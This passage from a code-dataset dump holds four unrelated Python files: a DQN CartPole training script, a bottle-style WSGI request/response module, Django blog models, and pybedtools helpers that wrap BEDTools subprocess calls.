DQN/CartPole/run_this.py
|
pickxiguapi/rl-algorithm
|
a57991acd178077fd7f51bcd4ae2ee58492475c2
|
[
"MIT"
] | null | null | null |
# -*- encoding: utf-8 -*-
"""
@File : run_this.py
@Time : 2020/12/4
@Author : Yuan Yifu
"""
import gym
from DQN_brain import DQN

env = gym.make('CartPole-v0')
# Access the raw environment beneath gym's wrappers.
env = env.unwrapped
# print(env.action_space.n) 2
# print(env.observation_space.shape[0]) 4
dqn = DQN()
# Number of stored transitions required before learning starts (see run()).
MEMORY_CAPACITY = 2000
def run():
    """Collect CartPole experience and train the DQN once the buffer is warm."""
    print('\nCollecting experience...\n')
    for i_episode in range(400):  # repeat for each episode in episodes
        s = env.reset()  # get start s of start state S
        ep_r = 0
        while True:  # repeat for each step of episode
            env.render()
            a = dqn.choose_action(s)  # choose action
            # take action
            s_, r, done, info = env.step(a)
            # modify the reward: shaped from cart position and pole angle —
            # presumably so centred, upright states score higher than the raw
            # reward; TODO confirm against DQN_brain's expectations.
            x, x_dot, theta, theta_dot = s_
            r1 = (env.x_threshold - abs(x)) / env.x_threshold - 0.8
            r2 = (env.theta_threshold_radians - abs(theta)) / env.theta_threshold_radians - 0.5
            r = r1 + r2
            # store transition in buffer
            dqn.store_transition(s, a, r, s_)
            ep_r += r
            if dqn.memory_counter > MEMORY_CAPACITY:
                dqn.learn()
                # NOTE(review): indentation reconstructed — the episode summary
                # appears to print only once learning has started; confirm
                # against the reference implementation.
                if done:
                    print('Ep: ', i_episode,
                          '| Ep_r: ', round(ep_r, 2))
            if done:
                # until S is terminal state
                break
            # get next state
            s = s_
if __name__ == '__main__':
    # Script entry point.
    run()
| 26.472727 | 95 | 0.521978 |
06d8652b894df20c7913bdd4dc7ba0de4d356eea
| 8,955 |
py
|
Python
|
brick/http.py
|
xsank/bottle
|
4c228043ea31811fffd8eb30914d025c1fd43dc0
|
[
"MIT"
] | 9 |
2015-01-06T01:32:43.000Z
|
2017-03-01T18:34:54.000Z
|
brick/http.py
|
jude90/bottle
|
4c228043ea31811fffd8eb30914d025c1fd43dc0
|
[
"MIT"
] | null | null | null |
brick/http.py
|
jude90/bottle
|
4c228043ea31811fffd8eb30914d025c1fd43dc0
|
[
"MIT"
] | 4 |
2015-02-05T09:48:43.000Z
|
2016-02-22T15:04:35.000Z
|
'''
Created on 2013-4-21
@author: Xsank
'''
import cgi
from Cookie import SimpleCookie
from StringIO import StringIO
from tempfile import TemporaryFile
from urllib import quote as urlquote
from urlparse import urlunsplit,parse_qs
from structure import HeaderDict,MultiDict
from util import depr,path_shift,parse_auth,cookie_decode,cookie_encode
from config import MEMFILE_MAX
class Request(object):
    """WSGI request wrapper (bottle-style, Python 2 codebase).

    Wraps a WSGI ``environ`` dict and exposes lazily-parsed views of it
    (GET, POST, headers, cookies, body).  Parsed results are cached back
    into ``environ`` under ``brick.*`` keys; ``__setitem__`` invalidates
    the relevant caches when the underlying raw keys change.
    """
    def __init__(self, environ=None, config=None):
        self.bind(environ or {}, config)
    def bind(self, environ, config=None):
        # (Re)attach this Request to a WSGI environ; recomputes path/method.
        self.environ = environ
        self.config = config or {}
        self.path = '/' + environ.get('PATH_INFO', '/').lstrip('/')
        self.method = environ.get('REQUEST_METHOD', 'GET').upper()
    @property
    def _environ(self):
        # Deprecated alias kept for backwards compatibility.
        depr("Request._environ renamed to Request.environ")
        return self.environ
    def copy(self):
        # Shallow copy: environ dict is copied, cached values are shared.
        return Request(self.environ.copy(), self.config)
    def path_shift(self, shift=1):
        # Move path segments between SCRIPT_NAME and PATH_INFO (mounting).
        script_name = self.environ.get('SCRIPT_NAME','/')
        self['SCRIPT_NAME'], self.path = path_shift(script_name, self.path, shift)
        self['PATH_INFO'] = self.path
    # Dict-like access delegates straight to the environ.
    def __getitem__(self, key): return self.environ[key]
    def __delitem__(self, key): self[key] = ""; del(self.environ[key])
    def __iter__(self): return iter(self.environ)
    def __len__(self): return len(self.environ)
    def keys(self): return self.environ.keys()
    def __setitem__(self, key, value):
        """Set an environ key and invalidate any dependent brick.* caches."""
        self.environ[key] = value
        todelete = []
        if key in ('PATH_INFO','REQUEST_METHOD'):
            # path/method are stored on self, so a full rebind is needed.
            self.bind(self.environ, self.config)
        elif key == 'wsgi.input': todelete = ('body','forms','files','params')
        elif key == 'QUERY_STRING': todelete = ('get','params')
        elif key.startswith('HTTP_'): todelete = ('headers', 'cookies')
        for key in todelete:
            if 'brick.' + key in self.environ:
                del self.environ['brick.' + key]
    @property
    def query_string(self):
        # Raw, unparsed query string.
        return self.environ.get('QUERY_STRING', '')
    @property
    def fullpath(self):
        # SCRIPT_NAME + PATH_INFO, without trailing-slash duplication.
        return self.environ.get('SCRIPT_NAME', '').rstrip('/') + self.path
    @property
    def url(self):
        """Reconstruct the full request URL from the environ."""
        scheme = self.environ.get('wsgi.url_scheme', 'http')
        # Prefer proxy-forwarded host, then the Host header.
        host = self.environ.get('HTTP_X_FORWARDED_HOST', self.environ.get('HTTP_HOST', None))
        if not host:
            host = self.environ.get('SERVER_NAME')
            port = self.environ.get('SERVER_PORT', '80')
            # Omit the port only for the scheme's default port.
            if scheme + port not in ('https443', 'http80'):
                host += ':' + port
        parts = (scheme, host, urlquote(self.fullpath), self.query_string, '')
        return urlunsplit(parts)
    @property
    def content_length(self):
        # -1 when the header is missing or empty.
        return int(self.environ.get('CONTENT_LENGTH','') or -1)
    @property
    def header(self):
        """HTTP request headers as a HeaderDict (cached in environ)."""
        if 'brick.headers' not in self.environ:
            header = self.environ['brick.headers'] = HeaderDict()
            for key, value in self.environ.iteritems():
                if key.startswith('HTTP_'):
                    # HTTP_USER_AGENT -> User-Agent
                    key = key[5:].replace('_','-').title()
                    header[key] = value
        return self.environ['brick.headers']
    @property
    def GET(self):
        """Query-string parameters as a MultiDict (cached)."""
        if 'brick.get' not in self.environ:
            data = parse_qs(self.query_string, keep_blank_values=True)
            get = self.environ['brick.get'] = MultiDict()
            for key, values in data.iteritems():
                for value in values:
                    get[key] = value
        return self.environ['brick.get']
    @property
    def POST(self):
        """Form/file data parsed via cgi.FieldStorage (cached).

        Populates brick.post (everything), brick.forms (plain fields) and
        brick.files (uploads) in one pass.
        """
        if 'brick.post' not in self.environ:
            self.environ['brick.post'] = MultiDict()
            self.environ['brick.forms'] = MultiDict()
            self.environ['brick.files'] = MultiDict()
            # Give FieldStorage a minimal environ so it never parses GET.
            safe_env = {'QUERY_STRING':''}
            for key in ('REQUEST_METHOD', 'CONTENT_TYPE', 'CONTENT_LENGTH'):
                if key in self.environ: safe_env[key] = self.environ[key]
            fb = self.body
            data = cgi.FieldStorage(fp=fb, environ=safe_env, keep_blank_values=True)
            for item in data.list or []:
                if item.filename:
                    # File upload: keep the FieldStorage item itself.
                    self.environ['brick.post'][item.name] = item
                    self.environ['brick.files'][item.name] = item
                else:
                    self.environ['brick.post'][item.name] = item.value
                    self.environ['brick.forms'][item.name] = item.value
        return self.environ['brick.post']
    @property
    def forms(self):
        # Accessing POST fills the brick.forms cache as a side effect.
        if 'brick.forms' not in self.environ: self.POST
        return self.environ['brick.forms']
    @property
    def files(self):
        # Accessing POST fills the brick.files cache as a side effect.
        if 'brick.files' not in self.environ: self.POST
        return self.environ['brick.files']
    @property
    def params(self):
        """ A combined MultiDict with POST and GET parameters. """
        if 'brick.params' not in self.environ:
            self.environ['brick.params'] = MultiDict(self.GET)
            self.environ['brick.params'].update(dict(self.forms))
        return self.environ['brick.params']
    @property
    def body(self):
        """Request body as a rewound, re-readable buffer.

        The wsgi.input stream is drained once (bounded by Content-Length)
        into a StringIO, or a TemporaryFile for bodies >= MEMFILE_MAX, and
        the buffer replaces wsgi.input so the body can be read again.
        """
        if 'brick.body' not in self.environ:
            maxread = max(0, self.content_length)
            stream = self.environ['wsgi.input']
            body = StringIO() if maxread < MEMFILE_MAX else TemporaryFile(mode='w+b')
            while maxread > 0:
                part = stream.read(min(maxread, MEMFILE_MAX))
                if not part:
                    break
                body.write(part)
                maxread -= len(part)
            self.environ['wsgi.input'] = body
            self.environ['brick.body'] = body
        self.environ['brick.body'].seek(0)
        return self.environ['brick.body']
    @property
    def auth(self):
        # Parsed Authorization header (format defined by util.parse_auth).
        return parse_auth(self.environ.get('HTTP_AUTHORIZATION',''))
    @property
    def COOKIES(self):
        """Request cookies as a plain {name: value} dict (cached)."""
        if 'brick.cookies' not in self.environ:
            raw_dict = SimpleCookie(self.environ.get('HTTP_COOKIE',''))
            self.environ['brick.cookies'] = {}
            for cookie in raw_dict.itervalues():
                self.environ['brick.cookies'][cookie.key] = cookie.value
        return self.environ['brick.cookies']
    def get_cookie(self, name, secret=None):
        # With *secret*, try to decode a signed cookie; fall back to raw value.
        value = self.COOKIES.get(name)
        dec = cookie_decode(value, secret) if secret else None
        return dec or value
    @property
    def is_ajax(self):
        # Convention set by most JS libraries on XMLHttpRequest calls.
        return self.header.get('X-Requested-With') == 'XMLHttpRequest'
class Response(object):
    """WSGI response wrapper: status, headers, cookies, content type."""
    def __init__(self, config=None):
        self.bind(config)
    def bind(self, config=None):
        # Reset to a fresh 200 text/html response.
        self._COOKIES = None
        self.status = 200
        self.headers = HeaderDict()
        self.content_type = 'text/html; charset=UTF-8'
        self.config = config or {}
    @property
    def header(self):
        # Deprecated alias kept for backwards compatibility.
        depr("Response.header renamed to Response.headers")
        return self.headers
    def copy(self):
        # Copies status/headers/content-type; cookies are NOT copied.
        copy = Response(self.config)
        copy.status = self.status
        copy.headers = self.headers.copy()
        copy.content_type = self.content_type
        return copy
    def wsgiheader(self):
        """Return the final (name, value) header list for the WSGI server.

        Folds pending cookies into Set-Cookie headers and strips headers
        that RFC-wise must not accompany 204/304 responses.
        """
        for c in self.COOKIES.values():
            if c.OutputString() not in self.headers.getall('Set-Cookie'):
                self.headers.append('Set-Cookie', c.OutputString())
        # rfc2616 section 4.3
        if self.status in (204, 304) and 'content-type' in self.headers:
            del self.headers['content-type']
        if self.status == 304:
            for h in ('allow', 'content-encoding', 'content-language',
                      'content-length', 'content-md5', 'content-range',
                      'content-type', 'last-modified'):
                if h in self.headers:
                    del self.headers[h]
        return list(self.headers.iterallitems())
    headerlist = property(wsgiheader)
    @property
    def charset(self):
        # Charset extracted from Content-Type, defaulting to UTF-8.
        if 'charset=' in self.content_type:
            return self.content_type.split('charset=')[-1].split(';')[0].strip()
        return 'UTF-8'
    @property
    def COOKIES(self):
        # Lazily-created SimpleCookie holding outgoing cookies.
        if not self._COOKIES:
            self._COOKIES = SimpleCookie()
        return self._COOKIES
    def set_cookie(self, key, value, secret=None, **kargs):
        """Set a cookie; non-string values require *secret* for signing.

        Extra keyword args become cookie attributes (max_age -> max-age).
        """
        if not isinstance(value, basestring):
            if not secret:
                raise TypeError('Cookies must be strings when secret is not set')
            value = cookie_encode(value, secret).decode('ascii')
        self.COOKIES[key] = value
        for k, v in kargs.iteritems():
            self.COOKIES[key][k.replace('_', '-')] = v
    def get_content_type(self):
        """Current value of the Content-Type header."""
        return self.headers['Content-Type']
    def set_content_type(self, value):
        self.headers['Content-Type'] = value
    content_type = property(get_content_type, set_content_type, None,
                            get_content_type.__doc__)
| 34.980469 | 95 | 0.590061 |
664012185793a3a146ab60fac8af78377b0a4aa0
| 2,141 |
py
|
Python
|
website/apps/blog/models.py
|
stahlnow/stahlnow
|
265dd46c54f68173071d1c86218201d6e618ceeb
|
[
"MIT"
] | 1 |
2017-03-14T08:08:31.000Z
|
2017-03-14T08:08:31.000Z
|
website/apps/blog/models.py
|
stahlnow/stahlnow
|
265dd46c54f68173071d1c86218201d6e618ceeb
|
[
"MIT"
] | null | null | null |
website/apps/blog/models.py
|
stahlnow/stahlnow
|
265dd46c54f68173071d1c86218201d6e618ceeb
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.models import User
from django.utils.timezone import now
from blog.managers import PublicManager
from taggit.managers import TaggableManager
class Category(models.Model):
    """Category model: a named, sluggified grouping for blog posts."""
    # Human-readable category name; also used for default ordering.
    title = models.CharField(_('title'), max_length=100)
    # URL-safe identifier, unique across all categories.
    slug = models.SlugField(_('slug'), unique=True)
    class Meta:
        verbose_name = _('category')
        verbose_name_plural = _('categories')
        db_table = 'blog_categories'
        ordering = ('title',)
    def __unicode__(self):
        # Python 2-style unicode display name.
        return u'%s' % self.title
class Post(models.Model):
    """Post model: a blog entry with publishing workflow and taxonomy."""
    # Editorial states; default is Public (2), see the status field below.
    STATUS_CHOICES = (
        (1, _('Draft')),
        (2, _('Public')),
    )
    title = models.CharField(_('title'), max_length=200)
    # Slug only needs to be unique among posts published on the same date.
    slug = models.SlugField(_('slug'), unique_for_date='publish')
    author = models.ForeignKey(User)
    body = models.TextField(_('body'), )
    # Optional summary shown in listings; excluded from the RSS feed.
    tease = models.TextField(
        _('tease'),
        blank=True,
        help_text=_('Concise text suggested. Does not appear in RSS feed.'))
    status = models.IntegerField(
        _('status'), choices=STATUS_CHOICES, default=2)
    allow_comments = models.BooleanField(_('allow comments'), default=True)
    # Publication timestamp; drives ordering and prev/next navigation.
    publish = models.DateTimeField(_('publish'), default=now)
    created = models.DateTimeField(_('created'), auto_now_add=True)
    modified = models.DateTimeField(_('modified'), auto_now=True)
    categories = models.ManyToManyField(Category)
    tags = TaggableManager()
    # Custom manager; presumably filters to public posts — see blog.managers.
    objects = PublicManager()
    class Meta:
        verbose_name = _('post')
        verbose_name_plural = _('posts')
        db_table = 'blog_posts'
        ordering = ('-publish',)
        get_latest_by = 'publish'
    def __unicode__(self):
        # Python 2-style unicode display name.
        return u'%s' % self.title
    @models.permalink
    def get_absolute_url(self):
        return 'post_detail', (), {'slug': self.slug}
    def get_previous_post(self):
        # Previous *public* post by publish date (status >= 2).
        return self.get_previous_by_publish(status__gte=2)
    def get_next_post(self):
        # Next *public* post by publish date (status >= 2).
        return self.get_next_by_publish(status__gte=2)
| 29.328767 | 76 | 0.658104 |
665138419969a4a1e38c6a6260c09958fdc447bb
| 21,821 |
py
|
Python
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pybedtools-0.7.6-py2.7-linux-x86_64.egg/pybedtools/helpers.py
|
poojavade/Genomics_Docker
|
829b5094bba18bbe03ae97daf925fee40a8476e8
|
[
"Apache-2.0"
] | 1 |
2019-07-29T02:53:51.000Z
|
2019-07-29T02:53:51.000Z
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pybedtools-0.7.6-py2.7-linux-x86_64.egg/pybedtools/helpers.py
|
poojavade/Genomics_Docker
|
829b5094bba18bbe03ae97daf925fee40a8476e8
|
[
"Apache-2.0"
] | 1 |
2021-09-11T14:30:32.000Z
|
2021-09-11T14:30:32.000Z
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pybedtools-0.7.6-py2.7-linux-x86_64.egg/pybedtools/helpers.py
|
poojavade/Genomics_Docker
|
829b5094bba18bbe03ae97daf925fee40a8476e8
|
[
"Apache-2.0"
] | 2 |
2016-12-19T02:27:46.000Z
|
2019-07-29T02:53:54.000Z
|
from __future__ import print_function
import sys
import os
import tempfile
import subprocess
import random
import string
import glob
import struct
import atexit
import six
import pysam
from six.moves import urllib
from . import cbedtools
from . import settings
from . import filenames
from . import genome_registry
from .logger import logger
from .cbedtools import create_interval_from_list
# Buffer size passed as bufsize= to the subprocess.Popen calls below.
BUFSIZE = 1
# Registry of tagged BedTool objects; populated elsewhere, read by find_tagged().
_tags = {}
def _check_for_bedtools(program_to_check='intersectBed', force_check=False):
    """
    Checks installation as well as version (based on whether or not "bedtools
    intersect" works, or just "intersectBed")
    """
    # Cached positive result short-circuits unless a re-check is forced.
    if settings._bedtools_installed and not force_check:
        return True
    try:
        # Probe the v2.15+ interface: "bedtools <subcommand>".
        p = subprocess.Popen(
            [os.path.join(settings._bedtools_path, 'bedtools'),
             settings._prog_names[program_to_check]],
            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        settings._bedtools_installed = True
        settings._v_2_15_plus = True
    except (OSError, KeyError) as err:
        try:
            # Fall back to the classic one-binary-per-program interface.
            p = subprocess.Popen(
                [os.path.join(settings._bedtools_path, program_to_check)],
                stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            settings._bedtools_installed = True
            settings._v_2_15_plus = False
        except OSError as err:
            # errno 2 == ENOENT: the executable was not found at all.
            if err.errno == 2:
                if settings._bedtools_path:
                    add_msg = "(tried path '%s')" % settings._bedtools_path
                else:
                    add_msg = ""
                # NOTE(review): implicit string concatenation loses a space
                # between "BEDTools" and the URL in the error message.
                raise OSError("Please make sure you have installed BEDTools"
                              "(https://github.com/arq5x/bedtools) and that "
                              "it's on the path. %s" % add_msg)
    # NOTE(review): on a successful fresh probe this returns None, not True;
    # only the cached path returns True. Callers appear to ignore the value.
def _check_for_R():
    """Verify that the R executable can be launched.

    Sets settings._R_installed on success; raises ValueError when R cannot
    be started from settings._R_path (or the system path if unset).
    """
    try:
        subprocess.Popen(
            [os.path.join(settings._R_path, 'R'), '--version'],
            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        settings._R_installed = True
    except OSError:
        add_msg = "(tried path '%s')" % settings._R_path if settings._R_path else ""
        raise ValueError(
            'Please install R and ensure it is on your path %s' % add_msg)
class Error(Exception):
    """Root of this module's exception hierarchy."""
    pass
class BEDToolsError(Error):
    """Raised when a BEDTools invocation fails.

    Carries the command line that was run and the error text it produced.
    """
    def __init__(self, cmd, msg):
        self.cmd = str(cmd)
        self.msg = str(msg)
    def __str__(self):
        pieces = ['\nCommand was:\n\n\t', self.cmd, '\n',
                  '\nError message was:\n', self.msg]
        return ''.join(pieces)
def isGZIP(fn):
    """Return True iff the file *fn* begins with the gzip magic bytes."""
    with open(fn, 'rb') as fh:
        magic = fh.read(3)
    return magic == b"\x1f\x8b\x08"
def isBGZIP(fn):
    """
    Reads a filename to see if it's a BGZIPed file or not.

    Checks the gzip magic (31, 139), deflate method, FEXTRA flag, and the
    BGZF "BC"/length-2 extra subfield per the BGZF spec.
    """
    # Fix: the original left the file handle open (open(fn).read()).
    with open(fn, 'rb') as fh:
        header_str = fh.read(15)
    if len(header_str) < 15:
        return False
    header = struct.unpack_from('BBBBiBBHBBB', header_str)
    id1, id2, cm, flg, mtime, xfl, os_, xlen, si1, si2, slen = header
    if (id1 == 31) and (id2 == 139) and (cm == 8) and (flg == 4) and \
            (si1 == 66) and (si2 == 67) and (slen == 2):
        return True
    return False
def isBAM(fn):
    """Return True iff *fn* is a BAM file.

    BAM shares the BGZIP container format, so after the container check the
    only way to tell BAM from plain BGZIP is to try parsing the header.
    """
    if not isBGZIP(fn):
        return False
    try:
        pysam.Samfile(fn, 'rb')
    except ValueError:
        return False
    return True
def find_tagged(tag):
    """
    Return the bedtool object registered under *tag*.

    Useful for tracking down bedtools you made previously; raises
    ValueError when no registered object carries that tag.
    """
    for item in _tags.values():
        try:
            item_tag = item._tag
        except AttributeError:
            continue
        if item_tag == tag:
            return item
    raise ValueError('tag "%s" not found' % tag)
def _flatten_list(x):
nested = True
while nested:
check_again = False
flattened = []
for element in x:
if isinstance(element, list):
flattened.extend(element)
check_again = True
else:
flattened.append(element)
nested = check_again
x = flattened[:]
return x
def set_tempdir(tempdir):
    """Use *tempdir* for this module's temp files.

    Useful for clusters that use a /scratch partition rather than a /tmp
    dir; simply points tempfile.tempdir at the given directory.  Raises
    ValueError if the directory does not exist.
    """
    if not os.path.exists(tempdir):
        raise ValueError(
            'The tempdir you specified, %s, does not exist' % tempdir)
    tempfile.tempdir = tempdir
def get_tempdir():
    """Return the directory currently used for this module's temp files."""
    current = tempfile.gettempdir()
    return current
def cleanup(verbose=False, remove_all=False):
    """Delete temp files created during this session.

    With *verbose*, report each file as it is removed.  With *remove_all*,
    ALL files matching "pybedtools.*.tmp" in the temp dir are deleted,
    regardless of which session created them.  No-op when
    settings.KEEP_TEMPFILES is set.
    """
    if settings.KEEP_TEMPFILES:
        return
    for path in filenames.TEMPFILES:
        if verbose:
            print('removing', path)
        if os.path.exists(path):
            os.unlink(path)
    if remove_all:
        pattern = os.path.join(get_tempdir(), 'pybedtools.*.tmp')
        for path in glob.glob(pattern):
            os.unlink(path)
def _version_2_15_plus_names(prog_name):
    """Return the argv prefix for *prog_name* for the installed BEDTools.

    For pre-2.15 installs this is just [prog_name]; for 2.15+ the classic
    name is mapped through settings._prog_names to its "bedtools <sub>"
    form.  Raises BEDToolsError for names that are neither classic nor
    already new-style.
    """
    if not settings._bedtools_installed:
        _check_for_bedtools()
    if not settings._v_2_15_plus:
        return [prog_name]
    try:
        prog_name = settings._prog_names[prog_name]
    except KeyError:
        # Bug fix: the original had an if/pass that fell through to the
        # raise, so even valid new-style names raised BEDToolsError.
        if prog_name not in settings._new_names:
            raise BEDToolsError(
                prog_name, prog_name + 'not a recognized BEDTools program')
    return [os.path.join(settings._bedtools_path, 'bedtools'), prog_name]
def call_bedtools(cmds, tmpfn=None, stdin=None, check_stderr=None, decode_output=True, encode_input=True):
    """
    Use subprocess.Popen to call BEDTools and catch any errors.
    Output goes to *tmpfn*, or, if None, output stays in subprocess.PIPE and
    can be iterated over.
    *stdin* is an optional file-like object that will be sent to
    subprocess.Popen.
    Prints some useful help upon getting common errors.
    *check_stderr* is a function that takes the stderr string as input and
    returns True if it's OK (that is, it's not really an error). This is
    needed, e.g., for calling fastaFromBed which will report that it has to
    make a .fai for a fasta file.
    *decode_output* should be set to False when you are iterating over a BAM
    file, where the data represent binary rather than text data.
    """
    # The four input/output routing cases below are selected by these flags.
    input_is_stream = stdin is not None
    output_is_stream = tmpfn is None
    # Rewrite the program name for the installed BEDTools version
    # ("bedtools intersect" on 2.15+ vs. the classic "intersectBed").
    _orig_cmds = cmds[:]
    cmds = []
    cmds.extend(_version_2_15_plus_names(_orig_cmds[0]))
    cmds.extend(_orig_cmds[1:])
    try:
        # coming from an iterator, sending as iterator
        if input_is_stream and output_is_stream:
            logger.debug(
                'helpers.call_bedtools(): input is stream, output is '
                'stream')
            logger.debug(
                'helpers.call_bedtools(): cmds=%s', ' '.join(cmds))
            p = subprocess.Popen(cmds,
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE,
                                 stdin=subprocess.PIPE,
                                 bufsize=BUFSIZE)
            if encode_input:
                for line in stdin:
                    p.stdin.write(line.encode())
            else:
                for line in stdin:
                    p.stdin.write(line)
            # This is important to prevent deadlocks
            p.stdin.close()
            if decode_output:
                output = (i.decode('UTF-8') for i in p.stdout)
            else:
                output = (i for i in p.stdout)
            # Streaming case: stderr cannot be inspected without draining it.
            stderr = None
        # coming from an iterator, writing to file
        if input_is_stream and not output_is_stream:
            logger.debug(
                'helpers.call_bedtools(): input is stream, output is file')
            logger.debug(
                'helpers.call_bedtools(): cmds=%s', ' '.join(cmds))
            outfile = open(tmpfn, 'wb')
            p = subprocess.Popen(cmds,
                                 stdout=outfile,
                                 stderr=subprocess.PIPE,
                                 stdin=subprocess.PIPE,
                                 bufsize=BUFSIZE)
            # File-like stdin is sent in one shot; iterables line by line.
            if hasattr(stdin, 'read'):
                stdout, stderr = p.communicate(stdin.read())
            else:
                for item in stdin:
                    p.stdin.write(item.encode())
                stdout, stderr = p.communicate()
            output = tmpfn
            outfile.close()
        # coming from a file, sending as iterator
        if not input_is_stream and output_is_stream:
            logger.debug(
                'helpers.call_bedtools(): input is filename, '
                'output is stream')
            logger.debug(
                'helpers.call_bedtools(): cmds=%s', ' '.join(cmds))
            p = subprocess.Popen(cmds,
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE,
                                 bufsize=BUFSIZE)
            if decode_output:
                output = (i.decode('UTF-8') for i in p.stdout)
            else:
                output = (i for i in p.stdout)
            stderr = None
        # file-to-file
        if not input_is_stream and not output_is_stream:
            logger.debug(
                'helpers.call_bedtools(): input is filename, output '
                'is filename (%s)', tmpfn)
            logger.debug(
                'helpers.call_bedtools(): cmds=%s', ' '.join(cmds))
            outfile = open(tmpfn, 'wb')
            p = subprocess.Popen(cmds,
                                 stdout=outfile,
                                 stderr=subprocess.PIPE,
                                 bufsize=BUFSIZE)
            stdout, stderr = p.communicate()
            output = tmpfn
            outfile.close()
        # Check if it's OK using a provided function to check stderr. If it's
        # OK, dump it to sys.stderr so it's printed, and reset it to None so we
        # don't raise an exception
        if check_stderr is not None:
            if isinstance(stderr, bytes):
                stderr = stderr.decode('UTF_8')
            if check_stderr(stderr):
                sys.stderr.write(stderr)
                stderr = None
        if stderr:
            # Fix for issue #147. In general, we consider warnings to not be
            # fatal, so just show 'em and continue on.
            #
            # bedtools source has several different ways of showing a warning,
            # but they seem to all have "WARNING" in the first 20 or so
            # characters
            if isinstance(stderr, bytes):
                stderr = stderr.decode('UTF_8')
            if len(stderr) > 20 and "WARNING" in stderr[:20]:
                sys.stderr.write(stderr)
            else:
                raise BEDToolsError(subprocess.list2cmdline(cmds), stderr)
    except (OSError, IOError) as err:
        print('%s: %s' % (type(err), os.strerror(err.errno)))
        print('The command was:\n\n\t%s\n' % subprocess.list2cmdline(cmds))
        # Map common errno values to actionable hints for the user.
        problems = {
            2: ('* Did you spell the command correctly?',
                '* Do you have BEDTools installed and on the path?'),
            13: ('* Do you have permission to write '
                 'to the output file ("%s")?' % tmpfn,),
            24: ('* Too many files open -- please submit '
                 'a bug report so that this can be fixed',)
        }
        print('Things to check:')
        print('\n\t' + '\n\t'.join(problems[err.errno]))
        raise OSError('See above for commands that gave the error')
    return output
def set_bedtools_path(path=""):
"""
Explicitly set path to `BEDTools` installation dir.
If BEDTools is not available on your system path, specify the path to the
dir containing the BEDTools executables (intersectBed, subtractBed, etc)
with this function.
To reset and use the default system path, call this function with no
arguments or use path="".
"""
settings._bedtools_path = path
def set_R_path(path=""):
"""
Explicitly set path to `R` installation dir.
If R is not available on the path, then it can be explicitly
specified here.
Use path="" to reset to default system path.
"""
settings._R_path = path
def _check_sequence_stderr(x):
"""
If stderr created by fastaFromBed starts with 'index file', then don't
consider it an error.
"""
if isinstance(x, bytes):
x = x.decode('UTF-8')
if x.startswith('index file'):
return True
if x.startswith("WARNING"):
return True
return False
def _call_randomintersect(_self, other, iterations, intersect_kwargs,
                          shuffle_kwargs, report_iterations, debug,
                          _orig_processes):
    """Run BedTool.randomintersection and materialize its results.

    Converting the generator to a list makes the result picklable so it
    can be shipped back across a multiprocessing Pool.
    """
    results = _self.randomintersection(
        other, iterations,
        intersect_kwargs=intersect_kwargs,
        shuffle_kwargs=shuffle_kwargs,
        report_iterations=report_iterations,
        debug=False, processes=None,
        _orig_processes=_orig_processes)
    return list(results)
def close_or_delete(*args):
    """
    Dispose of one or more BedTool objects, file-based or streaming.

    File-backed tools have their file unlinked; stream-backed tools are
    closed, and generator-backed ones are stopped via throw().
    """
    for bt in args:
        fn = bt.fn
        if isinstance(fn, six.string_types):
            os.unlink(fn)
        elif hasattr(fn, 'close'):
            fn.close()
        if hasattr(fn, 'throw'):
            fn.throw(StopIteration)
def n_open_fds():
    """Count file descriptors held open by the current process.

    Parses ``lsof -Ff`` output, counting "f<digits>" records (one per
    numeric descriptor).
    """
    pid = os.getpid()
    procs = subprocess.check_output(
        ['lsof', '-w', '-Ff', '-p', str(pid)])
    # Bug fix: check_output returns bytes on Python 3, so the original
    # comparison i[0] == 'f' never matched and the count was always 0.
    if isinstance(procs, bytes):
        procs = procs.decode('UTF-8')
    nprocs = 0
    for i in procs.splitlines():
        if i[1:].isdigit() and i[0] == 'f':
            nprocs += 1
    return nprocs
import re
coord_re = re.compile(
r"""
(?P<chrom>.+):
(?P<start>\d+)-
(?P<stop>\d+)
(?:\[(?P<strand>.)\])?""", re.VERBOSE)
def string_to_interval(s):
    """
    Convert string of the form "chrom:start-stop" or "chrom:start-stop[strand]"
    to an interval.
    Assumes zero-based coords.
    If it's already an interval, then return it as-is.
    """
    if not isinstance(s, six.string_types):
        return s
    m = coord_re.search(s)
    fields = [m.group('chrom'), m.group('start'), m.group('stop')]
    if m.group('strand'):
        # Strand present: pad with placeholder name/score columns.
        fields += ['.', '0', m.group('strand')]
    return create_interval_from_list(fields)
class FisherOutput(object):
    """Parsed result of ``bedtools fisher`` text output.

    Exposes the 2x2 contingency table (``.table``) and the p-values
    (``.left_tail``, ``.right_tail``, ``.two_tail``) plus the odds
    ``.ratio``.
    """
    def __init__(self, s, **kwargs):
        """
        fisher returns text results like::

            # Contingency Table
            #_________________________________________
            #           | not in -b    | in -b        |
            # not in -a | 3137160615   | 503          |
            #     in -a | 100          | 46           |
            #_________________________________________
            # p-values for fisher's exact test
            left    right    two-tail    ratio
            1.00000    0.00000    0.00000    2868973.922
        """
        # Accept a filename, an iterator of lines, or the raw text.
        if isinstance(s, str):
            s = open(s).read()
        if hasattr(s, 'next'):
            s = ''.join(i for i in s)
        table = {
            'not in -a': {
                'not in -b': None,
                'in -b': None
            },
            'in -a': {
                'not in -b': None,
                'in -b': None,
            },
        }
        self.text = s
        lines = s.splitlines()
        for i in lines:
            if 'not in -a' in i:
                # NOTE(review): the first numeric column in the table header
                # is "not in -b", but here the second token is bound to
                # `in_b` — verify against actual bedtools fisher output that
                # the cells are not swapped.
                _, in_b, not_in_b, _= i.strip().split('|')
                table['not in -a']['not in -b'] = int(not_in_b)
                table['not in -a']['in -b'] = int(in_b)
            if ' in -a' in i:
                _, in_b, not_in_b, _ = i.strip().split('|')
                table['in -a']['not in -b'] = int(not_in_b)
                table['in -a']['in -b'] = int(in_b)
        self.table = table
        # The final line holds the three p-values and the odds ratio.
        left, right, two_tail, ratio = lines[-1].split()
        self.left_tail = float(left)
        self.right_tail = float(right)
        self.two_tail = float(two_tail)
        self.ratio = float(ratio)
    def __str__(self):
        return self.text
    def __repr__(self):
